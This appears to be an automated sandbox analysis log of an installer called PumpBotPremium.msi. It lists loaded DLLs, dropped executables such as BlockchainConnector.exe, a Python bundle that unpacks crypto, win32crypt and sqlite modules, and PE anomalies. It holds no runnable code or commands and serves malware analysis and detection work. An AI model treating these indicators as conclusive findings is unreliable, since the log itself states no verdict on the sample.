Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe File written: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: PumpBotPremium.msi Static file information: File size 63906816 > 1048576
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000003.00000000.1739187011.00000000002AE000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\opencv-python\opencv-python\_skbuild\win-amd64-3.7\cmake-build\lib\python3\Release\cv2.pdb source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D76A75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: BlockchainConnector.exe, 00000007.00000002.1903815403.0000019A0A0E0000.00000002.00000001.01000000.00000010.sdmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00237530 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary, 3_2_00237530
Source: _MD5.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xf0c8
Source: _SHA1.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x9f02
Source: _mt19937.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x19d5b
Source: _scrypt.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xdb79
Source: QtGui.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x26ba90
Source: sip.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x28c77
Source: pythoncom310.dll.4.dr Static PE information: real checksum: 0x0 should be: 0xa906f
Source: mtrand.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x90fe9
Source: _Salsa20.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xe31f
Source: _cffi_backend.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x38dc3
Source: _raw_ctr.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xe14e
Source: _raw_cbc.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xd981
Source: _philox.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1f360
Source: _ghash_clmul.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xf9cb
Source: _rust.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x66978e
Source: _multiarray_umath.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2dc308
Source: _imagingcms.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x40e07
Source: _umath_linalg.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2df0e
Source: _generator.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xae69c
Source: md__mypyc.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x22c3d
Source: _raw_aes.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x10e4f
Source: _BLAKE2s.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x10e8d
Source: _cpuid_c.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xe7b0
Source: _raw_ecb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4fa5
Source: _multiarray_tests.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x21dfc
Source: _pcg64.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x23bc6
Source: _raw_ocb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xdbb7
Source: pywintypes310.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x26a6c
Source: _pocketfft_internal.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x24610
Source: _webp.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x89cd9
Source: _raw_aesni.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xec86
Source: _common.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x374d8
Source: _imaging.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x257081
Source: _raw_cfb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xbbc3
Source: _strxor.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x7233
Source: bit_generator.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x365da
Source: win32crypt.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2ba12
Source: _raw_ofb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4a09
Source: _bounded_integers.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x434b9
Source: _ghash_portable.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x9a05
Source: md.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x50be
Source: _brotli.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xd0a91
Source: _raw_eksblowfish.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xcfa2
Source: _psutil_windows.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1f10a
Source: QtCore.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x260d34
Source: QtWidgets.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4e36b6
Source: _imagingft.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1a8a9d
Source: _SHA256.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x56a0
Source: aipackagechainer.exe.2.dr Static PE information: real checksum: 0xda46d should be: 0xda93c
Source: _sfc64.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x13204
Source: BlockchainConnector.exe.2.dr Static PE information: section name: .eh_fram
Source: BlockchainConnector.exe.2.dr Static PE information: section name: .xdata
Source: BlockchainConnector.exe.4.dr Static PE information: section name: .eh_fram
Source: BlockchainConnector.exe.4.dr Static PE information: section name: .xdata
Source: libcrypto-1_1.dll.4.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.4.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: python310.dll.4.dr Static PE information: section name: PyRuntim
Source: qt5core.dll.4.dr Static PE information: section name: .qtmimed
Source: vcruntime140.dll.4.dr Static PE information: section name: _RDATA
Source: opencv_videoio_ffmpeg490_64.dll.4.dr Static PE information: section name: .rodata
Source: opencv_videoio_ffmpeg490_64.dll.4.dr Static PE information: section name: .xdata
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: .xdata
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /4
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /19
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /31
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /45
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /57
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /70
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /81
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /92
Source: _imagingft.pyd.4.dr Static PE information: section name: _RDATA
Source: cv2.pyd.4.dr Static PE information: section name: IPPCODE
Source: cv2.pyd.4.dr Static PE information: section name: IPPDATA
Source: cv2.pyd.4.dr Static PE information: section name: _RDATA
Source: cv2.pyd.4.dr Static PE information: section name: .debug_a
Source: cv2.pyd.4.dr Static PE information: section name: .debug_i
Source: cv2.pyd.4.dr Static PE information: section name: .debug_s
Source: cv2.pyd.4.dr Static PE information: section name: .debug_l
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00244444 push esi; ret 3_2_00244447
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027CEA4 push ecx; ret 3_2_0027CEB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E43B0 push eax; ret 11_2_030E43C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E4178 push eax; ret 11_2_030E43C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E6092 push 9000005Fh; iretd 11_2_030E6121
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E6A7A push esp; ret 11_2_030E6A83
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tk86t.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8554.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python310.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tcl86t.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7BF7.tmp
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C48.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B99.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libcrypto-1_1.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7CB7.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\sqlite3.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libssl-1_1.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140_1.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libffi-7.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C27.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C87.tmp
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python3.dll
